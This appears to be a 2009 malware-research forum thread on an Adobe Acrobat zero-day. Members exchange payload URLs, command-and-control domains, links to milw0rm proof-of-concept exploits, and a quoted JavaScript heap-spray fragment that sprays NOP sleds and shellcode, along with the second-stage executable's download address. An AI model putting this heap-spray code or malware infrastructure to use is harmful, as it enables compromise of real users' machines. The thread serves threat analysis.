Author Topic: Adobe/Acrobat 0-day  (Read 16086 times)

0 Members and 1 Guest are viewing this topic.

February 20, 2009, 07:06:26 am
Read 16086 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

February 20, 2009, 12:14:55 pm
Reply #1

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
hxxp://dump.vicp.cc/l/a.bin - url from the same 0day i suppose...

February 20, 2009, 01:37:22 pm
Reply #2

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
cnc on religion.xicp.net and religion.8866.org? Japan? WTF ???

February 21, 2009, 05:21:58 am
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

February 22, 2009, 06:28:20 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

February 22, 2009, 06:38:44 pm
Reply #5

DiFor

  • Jr. Member

  • Offline
  • **

  • 19
and saw somebody working version of this? very interesting to see

February 24, 2009, 06:55:40 am
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

February 24, 2009, 07:22:16 am
Reply #7

WIEx

  • Jr. Member

  • Offline
  • **

  • 34
    • Security
milw0rm POC-s:
http://milw0rm.com/exploits/8090
http://milw0rm.com/exploits/8099

I think that soon will attack as well as POC in public

February 24, 2009, 09:04:55 am
Reply #8

alta

  • Newbie

  • Offline
  • *

  • 3
Thanks WIEx for the lynks  ;)

February 24, 2009, 12:20:03 pm
Reply #9

DiFor

  • Jr. Member

  • Offline
  • **

  • 19
it's DoS exploit

February 24, 2009, 01:27:53 pm
Reply #10

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
but it works under 9 ;)

February 24, 2009, 02:17:51 pm
Reply #11

DiFor

  • Jr. Member

  • Offline
  • **

  • 19
it's only crash apllication)

February 24, 2009, 02:27:39 pm
Reply #12

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
the new payload for me... pdf md5: 8AE719CDD29F0E6AF4D4DD321CC40355

Code: [Select]
...
                while (pointers.length<=0x100000/2)pointers+=pointers
                pointers=pointers.substring(0,0x100000/2-32/2-4/2-pointers1.length-2/2
                while (nop.length<=0x100000/2)nop+=nop
                nop=nop.substring(0,0x100000/2-32/2-4/2-jmp.length-2/2)
                var x=new Array()
                for (i=0 ; i<150 ; i++)
                {
                        x[i]=nop+shellcode
                }
                for ( ; i<201 ; i++)
                {
                        x[i]=pointers+pointers1
                }
                return x
...

load from
Code: [Select]
http://202.67.215.110/caonimabi.exe
IP is very know from several malware, ex: http://www.threatexpert.com/report.aspx?md5=39376f28624e3de9e23d6fd57235b42e

February 24, 2009, 02:30:00 pm
Reply #13

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
it's only crash apllication)
u do not know the secret   :D

February 24, 2009, 02:33:00 pm
Reply #14

WIEx

  • Jr. Member

  • Offline
  • **

  • 34
    • Security
Quote
it's only crash apllication)

Yes, I said that this POC (proof of concept) exploit